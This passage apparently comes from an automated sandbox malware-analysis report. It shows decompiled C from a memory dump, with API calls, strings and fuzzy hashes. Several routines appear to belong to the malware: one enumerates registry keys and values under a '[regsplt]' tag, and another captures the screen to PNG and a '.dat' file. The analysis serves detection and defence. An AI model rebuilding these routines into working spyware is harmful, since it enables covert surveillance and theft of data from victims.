Part of subcall function 007801F5: GetLastError.KERNEL32(?,?,00788EEF,?,00000000,?,00000000,?,00789193,?,00000007,?,?,007896DE,?,?), ref: 0078021D

_free.LIBCMT ref: 00788C66
_free.LIBCMT ref: 00788C78
_free.LIBCMT ref: 00788C8A
_free.LIBCMT ref: 00788C9C

Memory Dump Source

Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true

Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 7241904ee91c7e3f9d678c888c2d063bb9645e069dbc68e91d207cb62b58f406
Instruction ID: b36fed1f1eaef44ce8f12c5bc2b0f4b09cdd76135660418723d838e9e261e818
Opcode Fuzzy Hash: 7241904ee91c7e3f9d678c888c2d063bb9645e069dbc68e91d207cb62b58f406
Instruction Fuzzy Hash: 32F06232885208FF86A0FB69E989C1A73F9BB857207944849F248D7500CF3CFC8187B6

Uniqueness

Uniqueness Score: -1.00%

Function 0077D8BC, Relevance: 7.5, APIs: 5, Instructions: 30
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E0077D8BC(signed int __ecx) {
				intOrPtr _t7;

				asm("lock xadd [eax], ecx");
				if((__ecx | 0xffffffff) == 0) {
					_t7 =  *0x7aa9a0; // 0x2d27d98
					if(_t7 != 0x7aa780) {
						E007801F5(_t7);
						 *0x7aa9a0 = 0x7aa780;
					}
				}
				E007801F5( *0x7aba08);
				 *0x7aba08 = 0;
				E007801F5( *0x7aba0c);
				 *0x7aba0c = 0;
				E007801F5( *0x7aba34);
				 *0x7aba34 = 0;
				E007801F5( *0x7aba38);
				 *0x7aba38 = 0;
				return 1;
			}

0x0077d8c5
0x0077d8c9
0x0077d8cb
0x0077d8d7
0x0077d8da
0x0077d8e0
0x0077d8e0
0x0077d8d7
0x0077d8ec
0x0077d8f9
0x0077d8ff
0x0077d90a
0x0077d910
0x0077d91b
0x0077d921
0x0077d929
0x0077d932

APIs

_free.LIBCMT ref: 0077D8DA

Part of subcall function 007801F5: HeapFree.KERNEL32(00000000,00000000,?,00788EEF,?,00000000,?,00000000,?,00789193,?,00000007,?,?,007896DE,?), ref: 0078020B
Part of subcall function 007801F5: GetLastError.KERNEL32(?,?,00788EEF,?,00000000,?,00000000,?,00789193,?,00000007,?,?,007896DE,?,?), ref: 0078021D

_free.LIBCMT ref: 0077D8EC
_free.LIBCMT ref: 0077D8FF
_free.LIBCMT ref: 0077D910
_free.LIBCMT ref: 0077D921

Memory Dump Source

Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true

Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 56ab4ca8ed21794450f469e12770de5052cf23fb78a9d6a66e8e441c8b7b7ed6
Instruction ID: c453117bf0df7e38852dbff483b60eda08617d603ce23ca32e01b0387d8da786
Opcode Fuzzy Hash: 56ab4ca8ed21794450f469e12770de5052cf23fb78a9d6a66e8e441c8b7b7ed6
Instruction Fuzzy Hash: 12F0DA75C82124DFCB957F24AC4A4093B60AB8A760701C116F61456672DF3D1846DFCA

Uniqueness

Uniqueness Score: -1.00%

Function 00750D8E, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 179
registryCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E00750D8E(void* __ecx) {
				int _v8;
				int _v12;
				int _v16;
				int _v20;
				int _v24;
				int _v28;
				int _v32;
				char _v56;
				int _v60;
				int _v64;
				int _v68;
				int _v72;
				int _v76;
				struct _FILETIME _v84;
				char _v95;
				char _v96;
				char _v108;
				char _v132;
				char _v156;
				short _v668;
				short _v1188;
				char _v11188;
				short _v43956;
				void* __ebx;
				void* __edi;
				int _t72;
				long _t73;
				void* _t93;
				long _t103;
				void* _t110;
				void* _t141;
				int _t145;
				int _t147;
				void* _t148;
				void* _t149;

				_t112 = __ecx;
				E00790D30();
				_push(_t141);
				_t145 = 0;
				_t110 = __ecx;
				E00771F00(_t141,  &_v1188, 0, 0x208);
				_t149 = _t148 + 0xc;
				_v24 = 0x104;
				_v8 = 0;
				_v12 = 0x3fff;
				RegQueryInfoKeyW(_t110,  &_v1188,  &_v24, 0,  &_v8,  &_v76,  &_v72,  &_v20,  &_v68,  &_v64,  &_v60,  &_v84);
				_t72 = _v8;
				if(_t72 != 0 && _t72 != 0) {
					do {
						_v28 = 0xff;
						_t103 = RegEnumKeyExW(_t110, _t145,  &_v668,  &_v28, 0, 0, 0,  &_v84);
						_t152 = _t103;
						if(_t103 == 0) {
							E00743311(E00744405(_t110,  &_v108,  &_v668, _t152, E0074427F(_t110,  &_v56, "\n")));
							E00741EF0();
							_t112 =  &_v56;
							E00741EF0();
						}
						_t145 = _t145 + 1;
					} while (_t145 < _v8);
				}
				_t73 = _v20;
				if(_t73 != 0) {
					_t147 = 0;
					if(_t73 != 0) {
						do {
							_v96 = 0;
							_v16 = 0x2710;
							asm("stosd");
							_v12 = 0x3fff;
							asm("stosd");
							asm("stosw");
							asm("stosb");
							_v43956 = 0;
							_t73 = RegEnumValueW(_t110, _t147,  &_v43956,  &_v12, 0,  &_v32,  &_v11188,  &_v16);
							_t156 = _t73;
							if(_t73 == 0) {
								E0077BACE(_t112, _v32,  &_v96, 0xa);
								_t149 = _t149 + 0xc;
								E00743311(E00744405(_t110,  &_v56,  &_v43956, _t156, E0074427F(_t110,  &_v132, "\n")));
								E00741EF0();
								E00741EF0();
								E00743436(E007475C2(_t110,  &_v132,  &_v96,  &_v95, _t156, E00742084(_t110,  &_v56, "\n")));
								E00741FC7();
								E00741FC7();
								_t93 = E00742084(_t110,  &_v156, "[regsplt]");
								E00743436(E00742F1D( &_v132, E007420AB(_t110,  &_v56,  &_v96, _t156,  &_v11188, _v16), _t93));
								E00741FC7();
								E00741FC7();
								_t112 =  &_v156;
								_t73 = E00741FC7();
							}
							_t147 = _t147 + 1;
						} while (_t147 < _v20);
					}
				}
				return _t73;
			}

0x00750d8e
0x00750d96
0x00750d9d
0x00750da3
0x00750dad
0x00750daf
0x00750db4
0x00750db7
0x00750dc1
0x00750dc4
0x00750df5
0x00750dfb
0x00750e00
0x00750e06
0x00750e09
0x00750e24
0x00750e2a
0x00750e2c
0x00750e51
0x00750e59
0x00750e5e
0x00750e61
0x00750e61
0x00750e66
0x00750e67
0x00750e06
0x00750e6c
0x00750e71
0x00750e77
0x00750e7b
0x00750e81
0x00750e83
0x00750e8a
0x00750e91
0x00750e92
0x00750e99
0x00750e9a
0x00750e9c
0x00750e9f
0x00750ec4
0x00750eca
0x00750ecc
0x00750edb
0x00750ee0
0x00750f06
0x00750f0e
0x00750f16
0x00750f3b
0x00750f43
0x00750f4b
0x00750f5b
0x00750f84
0x00750f8c
0x00750f94
0x00750f99
0x00750f9f
0x00750f9f
0x00750fa4
0x00750fa5
0x00750e81
0x00750e7b
0x00750fb4

APIs

RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00750DF5
RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000104,00000000,?,?,?,?), ref: 00750E24
RegEnumValueW.ADVAPI32(?,00000000,?,00003FFF,00000000,?,?,00002710,?,?,?,?,?,?,?,?), ref: 00750EC4

Strings

[regsplt], xrefs: 00750F50

Memory Dump Source

Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true

Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: Enum$InfoQueryValue
String ID: [regsplt]
API String ID: 3554306468-4262303796
Opcode ID: a570975cae0318b595ed581f70c82e4d1c1024e2e790d71c0dd536493730b493
Instruction ID: 5008fe88316a85d65fe23517a23bb6fcf618d2f4f7fcd52bc0b2281d99e22355
Opcode Fuzzy Hash: a570975cae0318b595ed581f70c82e4d1c1024e2e790d71c0dd536493730b493
Instruction Fuzzy Hash: 60511871900119EADB15EBA4DC8AEEEB7BDBF45300F500166F905E2091EF786B49CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00786969, Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 168
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E00786969(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8, intOrPtr _a12) {
				intOrPtr _v0;
				char _v6;
				char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v36;
				intOrPtr* _v64;
				intOrPtr _v96;
				intOrPtr* _v100;
				CHAR* _v104;
				signed int _v116;
				char _v290;
				signed int _v291;
				struct _WIN32_FIND_DATAA _v336;
				union _FINDEX_INFO_LEVELS _v340;
				signed int _v344;
				signed int _v348;
				intOrPtr _v440;
				intOrPtr* _t80;
				signed int _t82;
				signed int _t87;
				signed int _t91;
				signed int _t93;
				signed int _t95;
				signed int _t96;
				signed int _t100;
				signed int _t103;
				signed int _t108;
				signed int _t111;
				intOrPtr _t113;
				signed char _t115;
				union _FINDEX_INFO_LEVELS _t123;
				signed int _t128;
				signed int _t131;
				void* _t137;
				void* _t139;
				signed int _t140;
				signed int _t143;
				signed int _t145;
				signed int _t147;
				signed int* _t148;
				signed int _t151;
				void* _t154;
				CHAR* _t155;
				char _t158;
				char _t160;
				intOrPtr* _t163;
				void* _t164;
				intOrPtr* _t165;
				signed int _t167;
				void* _t169;
				intOrPtr* _t170;
				signed int _t174;
				signed int _t178;
				signed int _t179;
				intOrPtr* _t184;
				void* _t193;
				intOrPtr _t194;
				signed int _t196;
				signed int _t197;
				signed int _t199;
				signed int _t200;
				signed int _t202;
				union _FINDEX_INFO_LEVELS _t203;
				signed int _t208;
				signed int _t210;
				signed int _t211;
				void* _t213;
				intOrPtr _t214;
				void* _t215;
				signed int _t219;
				void* _t221;
				signed int _t222;
				void* _t223;
				void* _t224;
				void* _t225;
				signed int _t226;
				void* _t227;
				void* _t228;

				_t80 = _a8;
				_t224 = _t223 - 0x20;
				if(_t80 != 0) {
					_t208 = _a4;
					_t160 = 0;
					 *_t80 = 0;
					_t199 = 0;
					_t151 = 0;
					_v36 = 0;
					_v336.cAlternateFileName = 0;
					_v28 = 0;
					__eflags =  *_t208;
					if( *_t208 == 0) {
						L9:
						_v12 = _v12 & 0x00000000;
						_t82 = _t151 - _t199;
						_v8 = _t160;
						_t191 = (_t82 >> 2) + 1;
						__eflags = _t151 - _t199;
						_v16 = (_t82 >> 2) + 1;
						asm("sbb esi, esi");
						_t210 =  !_t208 & _t82 + 0x00000003 >> 0x00000002;
						__eflags = _t210;
						if(_t210 != 0) {
							_t197 = _t199;
							_t158 = _t160;
							do {
								_t184 =  *_t197;
								_t17 = _t184 + 1; // 0x1
								_v8 = _t17;
								do {
									_t143 =  *_t184;
									_t184 = _t184 + 1;
									__eflags = _t143;
								} while (_t143 != 0);
								_t158 = _t158 + 1 + _t184 - _v8;
								_t197 = _t197 + 4;
								_t145 = _v12 + 1;
								_v12 = _t145;
								__eflags = _t145 - _t210;
							} while (_t145 != _t210);
							_t191 = _v16;
							_v8 = _t158;
							_t151 = _v336.cAlternateFileName;
						}
						_t211 = E0077CF23(_t191, _v8, 1);
						_t225 = _t224 + 0xc;
						__eflags = _t211;
						if(_t211 != 0) {
							_t87 = _t211 + _v16 * 4;
							_v20 = _t87;
							_t192 = _t87;
							_v16 = _t87;
							__eflags = _t199 - _t151;
							if(_t199 == _t151) {
								L23:
								_t200 = 0;
								__eflags = 0;
								 *_a8 = _t211;
								goto L24;
							} else {
								_t93 = _t211 - _t199;
								__eflags = _t93;
								_v24 = _t93;
								do {
									_t163 =  *_t199;
									_v12 = _t163 + 1;
									do {
										_t95 =  *_t163;
										_t163 = _t163 + 1;
										__eflags = _t95;
									} while (_t95 != 0);
									_t164 = _t163 - _v12;
									_t35 = _t164 + 1; // 0x1
									_t96 = _t35;
									_push(_t96);
									_v12 = _t96;
									_t100 = E0078D309(_t164, _t192, _v20 - _t192 + _v8,  *_t199);
									_t225 = _t225 + 0x10;
									__eflags = _t100;
									if(_t100 != 0) {
										_push(0);
										_push(0);
										_push(0);
										_push(0);
										_push(0);
										E0077698A();
										asm("int3");
										_t221 = _t225;
										_push(_t164);
										_t165 = _v64;
										_t47 = _t165 + 1; // 0x1
										_t193 = _t47;
										do {
											_t103 =  *_t165;
											_t165 = _t165 + 1;
											__eflags = _t103;
										} while (_t103 != 0);
										_push(_t199);
										_t202 = _a8;
										_t167 = _t165 - _t193 + 1;
										_v12 = _t167;
										__eflags = _t167 - (_t103 | 0xffffffff) - _t202;
										if(_t167 <= (_t103 | 0xffffffff) - _t202) {
											_push(_t151);
											_t50 = _t202 + 1; // 0x1
											_t154 = _t50 + _t167;
											_t213 = E0077F348(_t167, _t154, 1);
											_t169 = _t211;
											__eflags = _t202;
											if(_t202 == 0) {
												L34:
												_push(_v12);
												_t154 = _t154 - _t202;
												_t108 = E0078D309(_t169, _t213 + _t202, _t154, _v0);
												_t226 = _t225 + 0x10;
												__eflags = _t108;
												if(__eflags != 0) {
													goto L37;
												} else {
													_t137 = E00786D38(_a12, __eflags, _t213);
													E007801F5(0);
													_t139 = _t137;
													goto L36;
												}
											} else {
												_push(_t202);
												_t140 = E0078D309(_t169, _t213, _t154, _a4);
												_t226 = _t225 + 0x10;
												__eflags = _t140;
												if(_t140 != 0) {
													L37:
													_push(0);
													_push(0);
													_push(0);
													_push(0);
													_push(0);
													E0077698A();
													asm("int3");
													_push(_t221);
													_t222 = _t226;
													_t227 = _t226 - 0x150;
													_t111 =  *0x7aa00c; // 0x67a7e35e
													_v116 = _t111 ^ _t222;
													_t170 = _v100;
													_push(_t154);
													_t155 = _v104;
													_push(_t213);
													_t214 = _v96;
													_push(_t202);
													_v440 = _t214;
													while(1) {
														__eflags = _t170 - _t155;
														if(_t170 == _t155) {
															break;
														}
														_t113 =  *_t170;
														__eflags = _t113 - 0x2f;
														if(_t113 != 0x2f) {
															__eflags = _t113 - 0x5c;
															if(_t113 != 0x5c) {
																__eflags = _t113 - 0x3a;
																if(_t113 != 0x3a) {
																	_t170 = E0078F5C0(_t155, _t170);
																	continue;
																}
															}
														}
														break;
													}
													_t194 =  *_t170;
													__eflags = _t194 - 0x3a;
													if(_t194 != 0x3a) {
														L47:
														_t203 = 0;
														__eflags = _t194 - 0x2f;
														if(_t194 == 0x2f) {
															L51:
															_t115 = 1;
															__eflags = 1;
														} else {
															__eflags = _t194 - 0x5c;
															if(_t194 == 0x5c) {
																goto L51;
															} else {
																__eflags = _t194 - 0x3a;
																if(_t194 == 0x3a) {
																	goto L51;
																} else {
																	_t115 = 0;
																}
															}
														}
														asm("sbb eax, eax");
														_v344 =  ~(_t115 & 0x000000ff) & _t170 - _t155 + 0x00000001;
														E00771F00(_t203,  &_v336, _t203, 0x140);
														_t228 = _t227 + 0xc;
														_t215 = FindFirstFileExA(_t155, _t203,  &_v336, _t203, _t203, _t203);
														_t123 = _v340;
														__eflags = _t215 - 0xffffffff;
														if(_t215 != 0xffffffff) {
															_t174 =  *((intOrPtr*)(_t123 + 4)) -  *_t123;
															__eflags = _t174;
															_v348 = _t174 >> 2;
															do {
																__eflags = _v336.cFileName - 0x2e;
																if(_v336.cFileName != 0x2e) {
																	L64:
																	_push(_t123);
																	_push(_v344);
																	_t123 =  &(_v336.cFileName);
																	_push(_t155);
																	_push(_t123);
																	L28();
																	_t228 = _t228 + 0x10;
																	__eflags = _t123;
																	if(_t123 != 0) {
																		goto L54;
																	} else {
																		goto L65;
																	}
																} else {
																	_t178 = _v291;
																	__eflags = _t178;
																	if(_t178 == 0) {
																		goto L65;
																	} else {
																		__eflags = _t178 - 0x2e;
																		if(_t178 != 0x2e) {
																			goto L64;
																		} else {
																			__eflags = _v290;
																			if(_v290 == 0) {
																				goto L65;
																			} else {
																				goto L64;
																			}
																		}
																	}
																}
																goto L58;
																L65:
																_t128 = FindNextFileA(_t215,  &_v336);
																__eflags = _t128;
																_t123 = _v340;
															} while (_t128 != 0);
															_t195 =  *_t123;
															_t179 = _v348;
															_t131 =  *((intOrPtr*)(_t123 + 4)) -  *_t123 >> 2;
															__eflags = _t179 - _t131;
															if(_t179 != _t131) {
																E0077AF20(_t155, _t203, _t215, _t195 + _t179 * 4, _t131 - _t179, 4, E00786951);
															}
														} else {
															_push(_t123);
															_push(_t203);
															_push(_t203);
															_push(_t155);
															L28();
															L54:
															_t203 = _t123;
														}
														__eflags = _t215 - 0xffffffff;
														if(_t215 != 0xffffffff) {
															FindClose(_t215);
														}
													} else {
														__eflags = _t170 -  &(_t155[1]);
														if(_t170 ==  &(_t155[1])) {
															goto L47;
														} else {
															_push(_t214);
															_push(0);
															_push(0);
															_push(_t155);
															L28();
														}
													}
													L58:
													__eflags = _v16 ^ _t222;
													return E0076FD1B(_v16 ^ _t222);
												} else {
													goto L34;
												}
											}
										} else {
											_t139 = 0xc;
											L36:
											return _t139;
										}
									} else {
										goto L22;
									}
									goto L68;
									L22:
									_t196 = _v16;
									 *((intOrPtr*)(_v24 + _t199)) = _t196;
									_t199 = _t199 + 4;
									_t192 = _t196 + _v12;
									_v16 = _t196 + _v12;
									__eflags = _t199 - _t151;
								} while (_t199 != _t151);
								goto L23;
							}
						} else {
							_t200 = _t199 | 0xffffffff;
							L24:
							E007801F5(0);
							goto L25;
						}
					} else {
						while(1) {
							_v8 = 0x3f2a;
							_v6 = _t160;
							_t147 = E0078F580( *_t208,  &_v8);
							__eflags = _t147;
							if(_t147 != 0) {
								_push( &_v36);
								_push(_t147);
								_push( *_t208);
								L38();
								_t224 = _t224 + 0xc;
							} else {
								_t147 =  &_v36;
								_push(_t147);
								_push(0);
								_push(0);
								_push( *_t208);
								L28();
								_t224 = _t224 + 0x10;
							}
							_t200 = _t147;
							__eflags = _t200;
							if(_t200 != 0) {
								break;
							}
							_t208 = _t208 + 4;
							_t160 = 0;
							__eflags =  *_t208;
							if( *_t208 != 0) {
								continue;
							} else {
								_t151 = _v336.cAlternateFileName;
								_t199 = _v36;
								goto L9;
							}
							goto L68;
						}
						L25:
						E00786D13( &_v36);
						_t91 = _t200;
						goto L26;
					}
				} else {
					_t148 = E0077A504();
					_t219 = 0x16;
					 *_t148 = _t219;
					E0077695D();
					_t91 = _t219;
					L26:
					return _t91;
				}
				L68:
			}

0x0078696e
0x00786971
0x00786977
0x0078698f
0x00786992
0x00786996
0x00786998
0x0078699a
0x0078699c
0x0078699f
0x007869a2
0x007869a5
0x007869a7
0x007869ff
0x007869ff
0x00786a05
0x00786a07
0x00786a12
0x00786a16
0x00786a18
0x00786a1b
0x00786a1f
0x00786a1f
0x00786a21
0x00786a23
0x00786a25
0x00786a27
0x00786a27
0x00786a29
0x00786a2c
0x00786a2f
0x00786a2f
0x00786a31
0x00786a32
0x00786a32
0x00786a3d
0x00786a3f
0x00786a42
0x00786a43
0x00786a46
0x00786a46
0x00786a4a
0x00786a4d
0x00786a50
0x00786a50
0x00786a5e
0x00786a60
0x00786a63
0x00786a65
0x00786a6f
0x00786a72
0x00786a75
0x00786a77
0x00786a7a
0x00786a7c
0x00786acc
0x00786acf
0x00786acf
0x00786ad1
0x00000000
0x00786a7e
0x00786a80
0x00786a80
0x00786a82
0x00786a85
0x00786a85
0x00786a8a
0x00786a8d
0x00786a8d
0x00786a8f
0x00786a90
0x00786a90
0x00786a94
0x00786a97
0x00786a97
0x00786a9a
0x00786a9d
0x00786aaa
0x00786aaf
0x00786ab2
0x00786ab4
0x00786aee
0x00786aef
0x00786af0
0x00786af1
0x00786af2
0x00786af3
0x00786af8
0x00786afc
0x00786afe
0x00786aff
0x00786b02
0x00786b02
0x00786b05
0x00786b05
0x00786b07
0x00786b08
0x00786b08
0x00786b11
0x00786b12
0x00786b15
0x00786b18
0x00786b1b
0x00786b1d
0x00786b24
0x00786b26
0x00786b29
0x00786b33
0x00786b36
0x00786b37
0x00786b39
0x00786b4d
0x00786b4d
0x00786b50
0x00786b5a
0x00786b5f
0x00786b62
0x00786b64
0x00000000
0x00786b66
0x00786b6a
0x00786b73
0x00786b79
0x00000000
0x00786b7c
0x00786b3b
0x00786b3b
0x00786b41
0x00786b46
0x00786b49
0x00786b4b
0x00786b82
0x00786b84
0x00786b85
0x00786b86
0x00786b87
0x00786b88
0x00786b89
0x00786b8e
0x00786b91
0x00786b92
0x00786b94
0x00786b9a
0x00786ba1
0x00786ba4
0x00786ba7
0x00786ba8
0x00786bab
0x00786bac
0x00786baf
0x00786bb0
0x00786bd1
0x00786bd1
0x00786bd3
0x00000000
0x00000000
0x00786bb8
0x00786bba
0x00786bbc
0x00786bbe
0x00786bc0
0x00786bc2
0x00786bc4
0x00786bcf
0x00000000
0x00786bcf
0x00786bc4
0x00786bc0
0x00000000
0x00786bbc
0x00786bd5
0x00786bd7
0x00786bda
0x00786bf3
0x00786bf3
0x00786bf5
0x00786bf8
0x00786c08
0x00786c0a
0x00786c0a
0x00786bfa
0x00786bfa
0x00786bfd
0x00000000
0x00786bff
0x00786bff
0x00786c02
0x00000000
0x00786c04
0x00786c04
0x00786c04
0x00786c02
0x00786bfd
0x00786c18
0x00786c1c
0x00786c2a
0x00786c2f
0x00786c44
0x00786c46
0x00786c4c
0x00786c4f
0x00786c81
0x00786c81
0x00786c86
0x00786c8c
0x00786c8c
0x00786c93
0x00786cad
0x00786cad
0x00786cae
0x00786cb4
0x00786cba
0x00786cbb
0x00786cbc
0x00786cc1
0x00786cc4
0x00786cc6
0x00000000
0x00000000
0x00000000
0x00000000
0x00786c95
0x00786c95
0x00786c9b
0x00786c9d
0x00000000
0x00786c9f
0x00786c9f
0x00786ca2
0x00000000
0x00786ca4
0x00786ca4
0x00786cab
0x00000000
0x00000000
0x00000000
0x00000000
0x00786cab
0x00786ca2
0x00786c9d
0x00000000
0x00786cc8
0x00786cd0
0x00786cd6
0x00786cd8
0x00786cd8
0x00786ce0
0x00786ce5
0x00786ced
0x00786cf0
0x00786cf2
0x00786d06
0x00786d0b
0x00786c51
0x00786c51
0x00786c52
0x00786c53
0x00786c54
0x00786c55
0x00786c5d
0x00786c5d
0x00786c5d
0x00786c5f
0x00786c62
0x00786c65
0x00786c65
0x00786bdc
0x00786bdf
0x00786be1
0x00000000
0x00786be3
0x00786be3
0x00786be6
0x00786be7
0x00786be8
0x00786be9
0x00786bee
0x00786be1
0x00786c6d
0x00786c72
0x00786c7d
0x00000000
0x00000000
0x00000000
0x00786b4b
0x00786b1f
0x00786b21
0x00786b7d
0x00786b81
0x00786b81
0x00000000
0x00000000
0x00000000
0x00000000
0x00786ab6
0x00786ab9
0x00786abc
0x00786abf
0x00786ac2
0x00786ac5
0x00786ac8
0x00786ac8
0x00000000
0x00786a85
0x00786a67
0x00786a67
0x00786ad3
0x00786ad5
0x00000000
0x00786ada
0x007869a9
0x007869a9
0x007869ac
0x007869b5
0x007869b8
0x007869bf
0x007869c1
0x007869da
0x007869db
0x007869dc
0x007869de
0x007869e3
0x007869c3
0x007869c3
0x007869c6
0x007869c7
0x007869c9
0x007869cb
0x007869cd
0x007869d2
0x007869d2
0x007869e6
0x007869e8
0x007869ea
0x00000000
0x00000000
0x007869f0
0x007869f3
0x007869f5
0x007869f7
0x00000000
0x007869f9
0x007869f9
0x007869fc
0x00000000
0x007869fc
0x00000000
0x007869f7
0x00786adb
0x00786ade
0x00786ae3
0x00000000
0x00786ae6
0x00786979
0x00786979
0x00786980
0x00786981
0x00786983
0x00786988
0x00786ae7
0x00786aeb
0x00786aeb
0x00000000

APIs

_strpbrk.LIBCMT ref: 007869B8
_free.LIBCMT ref: 00786AD5

Part of subcall function 0077698A: IsProcessorFeaturePresent.KERNEL32(00000017,0077695C,?,?,?,?,?,00000000,?,?,0077697C,00000000,00000000,00000000,00000000,00000000), ref: 0077698C
Part of subcall function 0077698A: GetCurrentProcess.KERNEL32(C0000417), ref: 007769AE
Part of subcall function 0077698A: TerminateProcess.KERNEL32(00000000), ref: 007769B5

Strings

., xrefs: 00786C8C
*?, xrefs: 007869AC

Memory Dump Source

Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true

Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
String ID: *?$.
API String ID: 2812119850-3972193922
Opcode ID: 6b240cb6298be9445e1c69f89697b1b7d8a15ebc161a029acef64c7191a131ac
Instruction ID: d9ae3cbe0b6eb84258921703b1d610f99df36246fad30c61beb2967e0e3c89a4
Opcode Fuzzy Hash: 6b240cb6298be9445e1c69f89697b1b7d8a15ebc161a029acef64c7191a131ac
Instruction Fuzzy Hash: E851B375E40109EFDF14EFA8C841AADBBB5EF48314F24C16DE554E7340E679AE018B50

Uniqueness

Uniqueness Score: -1.00%

Function 0075576E, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 128
fileCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E0075576E(void* __ecx, void* __edx, void* __eflags) {
				char _v1048;
				char _v1056;
				char _v1092;
				void* _v1096;
				char _v1112;
				char _v1120;
				void* _v1124;
				void* _v1136;
				char _v1144;
				char _v1152;
				char _v1156;
				void* _v1160;
				char _v1184;
				char _v1200;
				void* _v1204;
				char _v1224;
				char _v1232;
				void* __ebx;
				void* __edi;
				void* __ebp;
				intOrPtr* _t39;
				void* _t54;
				void* _t57;
				void* _t60;
				void* _t67;
				void* _t73;
				char* _t84;
				char* _t86;
				void* _t120;
				void* _t121;
				void* _t123;
				intOrPtr* _t124;
				signed int _t128;
				void* _t130;

				_t133 = __eflags;
				_t130 = (_t128 & 0xfffffff8) - 0x4b4;
				_t121 = __ecx;
				_t74 = __edx;
				E007430A6(__edx,  &_v1184, E0074427F(__edx,  &_v1156, __ecx), _t121, __eflags, L"png");
				E00741EF0();
				E00754906( &_v1120, __edx, __eflags, 0);
				_t84 =  &_v1120;
				_t39 =  *0x7abb04(E00741F95(_t84), E00742489(), _t120, _t123, _t73);
				_t124 = _t39;
				E0075441B( &_v1144, _t124);
				_t86 = L"image/png";
				E00754C72(_t86,  &_v1112);
				E00754493(E00741EEB( &_v1200),  &_v1152, _t43,  &_v1112);
				 *((intOrPtr*)( *_t124 + 8))(_t124, _t86, _t84);
				if( *((char*)(E00741F95(E00741E49(0x7ac578,  &_v1112, _t133, 0x1b)))) == 1) {
					E007420D5(__edx,  &_v1224);
					_t54 = E007579DC(E00741EEB( &_v1200),  &_v1224);
					_t135 = _t54;
					if(_t54 != 0) {
						DeleteFileW(E00741EEB( &_v1200));
						_t57 = E00742489();
						E00745A7C( &_v1048, E00741F95(0x7ac560), _t57);
						_t60 = E00742489();
						E00745BA4(_t74,  &_v1056,  &_v1224,  &_v1184, E00741F95( &_v1232), _t60);
						E007430A6(_t74,  &_v1120, E0074427F(_t74,  &_v1092, _t121), _t121, _t135, L"dat");
						E00741EF0();
						_t67 = E00741EEB( &_v1120);
						E007420EC(_t74, _t130 - 0x18, _t64, _t135,  &_v1200);
						E00757A4E(_t67);
						E00741EF0();
						E00741FC7();
					}
					_t48 = E00741FC7();
				}
				E00754441(_t48,  &_v1152);
				E00741FC7();
				return E00741EF0();
			}

0x0075576e
0x00755774
0x0075577d
0x0075577f
0x00755796
0x007557a0
0x007557ad
0x007557bd
0x007557c7
0x007557ce
0x007557d5
0x007557e1
0x007557e6
0x00755802
0x0075580a
0x00755823
0x0075582d
0x00755841
0x00755846
0x00755848
0x00755858
0x00755865
0x0075587a
0x00755883
0x0075589f
0x007558bf
0x007558cc
0x007558d8
0x007558e9
0x007558f0
0x007558ff
0x00755908
0x00755908
0x00755911
0x00755911
0x0075591a
0x00755923
0x00755937

APIs

Part of subcall function 00754906: CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00754921
Part of subcall function 00754906: CreateCompatibleDC.GDI32(00000000), ref: 0075492D

Part of subcall function 0075441B: GdipLoadImageFromStream.GDIPLUS(?,?), ref: 00754431

Part of subcall function 00754493: GdipSaveImageToFile.GDIPLUS(?,?,?,00000000), ref: 007544A4

Part of subcall function 007579DC: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,00000000,00000000,?,00744230,0079F464), ref: 007579F9

DeleteFileW.KERNEL32(00000000,0000001B), ref: 00755858

Strings

image/png, xrefs: 007557E1
png, xrefs: 00755781
dat, xrefs: 007558A4

Memory Dump Source

Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true

Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: CreateFile$GdipImage$CompatibleDeleteFromLoadSaveStream
String ID: dat$image/png$png
API String ID: 4253173196-186023265
Opcode ID: 94b903f81330c321db6f7562441bb87ca0a1047cb5fe3583f4264efb0ca79539
Instruction ID: 400bea66b6ec74738519b66d65cc13ee0184b4037a6f4719bda14e07fde234a8
Opcode Fuzzy Hash: 94b903f81330c321db6f7562441bb87ca0a1047cb5fe3583f4264efb0ca79539
Instruction Fuzzy Hash: 8A418475508340DBC314F760D85AEEFB7A9AF91311F804A2DF846571A2EF386A4DC692

Uniqueness

Uniqueness Score: -1.00%

Function 0077CC8A, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E0077CC8A(void* __ecx, void* __edx, intOrPtr _a4) {
				signed int _v8;
				void* _v12;
				char _v16;
